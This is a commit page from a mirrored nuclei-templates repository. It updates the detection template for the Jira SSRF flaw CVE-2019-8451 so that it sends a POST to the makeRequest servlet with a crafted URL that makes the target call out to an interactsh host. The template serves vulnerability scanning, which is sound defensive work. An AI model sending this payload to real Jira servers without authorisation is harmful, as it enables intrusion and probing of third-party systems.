daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Update JIRA SSRF

patch-1
PikPikcU 2021-07-30 18:50:31 +07:00 committed by GitHub
parent 878984cd75
commit 5bf63d1811
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 10 additions and 5 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

15
cves/2019/CVE-2019-8451.yaml
View File

@ -8,17 +8,22 @@ info:
reference: | reference: |
- https://www.tenable.com/blog/cve-2019-8451-proof-of-concept-available-for-server-side-request-forgery-ssrf-vulnerability-in - https://www.tenable.com/blog/cve-2019-8451-proof-of-concept-available-for-server-side-request-forgery-ssrf-vulnerability-in
- https://jira.atlassian.com/browse/JRASERVER-69793 - https://jira.atlassian.com/browse/JRASERVER-69793
- https://hackerone.com/reports/713900
tags: cve,cve2019,atlassian,jira,ssrf tags: cve,cve2019,atlassian,jira,ssrf
requests: requests:
- method: GET - method: POST
path: path:
- '{{BaseURL}}/plugins/servlet/gadgets/makeRequest?url=https://{{Hostname}}:1337@example.com' - '{{BaseURL}}/plugins/servlet/gadgets/makeRequest'
data: |
url=https://{{Hostname}}:443@{{interactsh-url}}
headers: headers:
X-Atlassian-token: no-check X-Atlassian-token: no-check
Content-Type: application/x-www-form-urlencoded
matchers: matchers:
- type: word - type: word
name: ssrf-response-body part: interactsh_protocol
words: words:
- '<p>This domain is for use in illustrative examples in documents.' - "dns"
part: body